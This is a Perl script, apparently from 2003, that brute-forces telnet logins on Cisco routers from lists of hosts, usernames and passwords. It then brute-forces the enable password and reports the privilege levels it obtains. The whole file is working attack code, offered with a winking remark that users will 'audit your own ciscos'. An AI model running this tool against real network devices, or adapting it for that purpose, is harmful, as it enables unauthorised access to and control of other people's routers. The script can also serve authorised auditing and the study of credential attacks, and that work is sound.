#!/usr/bin/perl

## fugi@bl.org 071703
## usage
## ./simple.pl > outfile 
## files user,pass,host holds lists for input
## NOTE leave the first line of user file blank for passwd only prompts
## 
## attempts telnet logins for ciscos whos IPs are provided
## will bruteforce with login:password or just password prompts
## if login is sucessful, will report priv level and brute enable password
## if enable is sucessful, will report priv level
## script is messy, however, functional. scripted for my personal use
## please communicate any changes or requests for changes to fugi@bl.org
## requires perl modules Net::Telnet::Cisco
## will loop logins even is sucessful is found so can report multiple sucess
## why? because there may be many logins with many priv levels
## enable loop will end on sucess and report
## ios_break in code is necessary for some stupid ciscos
## do not email me asking questions of a degenerate nature
## if you can't figure out how to use it, I don't care
## be an orthogonal thinker and figure it out.
## I assume you will use it to audit your own ciscos, of corse.



use Net::Telnet::Cisco;


open(PASS,"pass");
@pass=<PASS>;
close PASS;

open(USER,"user");
@user=<USER>;
close USER;

open(HOST,"host");
@host=<HOST>;
close HOST;

chomp(@pass);
chomp(@user);
chomp(@host);

$pnum=@pass;
$unum=@user;
$hnum=@host;
$goten=0;
$priv=0;
$lpriv=0;
$i=0;
$x=0;
$u=0;
$h=0;

########################
## Loop through hosts ##
########################

print "host:user:pass:priv:enable:priv\n";
while($h < $hnum) {

############################
## Loop through usernames ##
############################

while($u < $unum) {

############################
## Loop through passwords ##
############################

while($i < $pnum) {
$good = login();
if($good) 
	{
		print "$host[$h]:$user[$u]:$pass[$i]"; 
		if($lpriv) {print ":$lpriv"; $lpriv=0; }
		if($goten == 0) { 
			if(enable() == 1) { print ":$pass[$x]"; $goten=1;} 
			if($priv) { print ":$priv\n"; $priv=0; }
			else { print "\n"; }
		}
		else { print "\n"; }
	}
if($good && $user[$u] eq '') { goto THERE; }

$i++;
} #end of pass loop

$i=0; $x=0;
$u++;
} #end of user loop
THERE:
$goten=0;
$u=0; $i=0; $x=0;
$h++;
} #end host loop



######################
## Subroutine login ##
######################
 
sub login {
$session = Net::Telnet::Cisco->new(Host => $host[$h], Errmode => sub { $errm = shift });
$ok = $session->login($user[$u],$pass[$i]);
if($ok) {
	if((@lout = $session->cmd("show privilege")) && ($lout[0] =~ /privilege/) ) {
		@lspl = split(/ /,$lout[0]);
		$lpriv = $lspl[4];
		chomp($lpriv);
        }
}
$session->close;
$errm = shift;
return $ok;
}

#######################
## Subroutine enable ##
#######################

sub enable {
$session = Net::Telnet::Cisco->new(Host => $host[$h], Errmode => sub { $oops++; });
$session->login($user[$u],$pass[$i]);
$session->waitfor_pause(0);

$ptmp = $session->last_prompt;
chomp($ptmp);
$thing = "/$ptmp/";
$found=0;

while($x < $pnum) {
 	$session->ios_break;
	$session->cmd('');
	$found = $session->waitfor($thing);
	if($found) { 
	$oops=0;
	if( $session->enable($pass[$x])  ) {
		if($oops == 0) {
	
			if((@out = $session->cmd("show privilege")) && ($out[0] =~ /privilege/) ) {
				@spl = split(/ /,$out[0]); 
				$priv = $spl[4];
				chomp($priv);
			}
		
			return 1; 
			$session->close; 
		}
		else { $oops = 0; }
	}
	}  ##### IF FOUND LOOP
	else { $session->ios_break; }
	$x++;
	sleep 1;
	$errm = shift;
	}
	$session->close;
	return 0;
}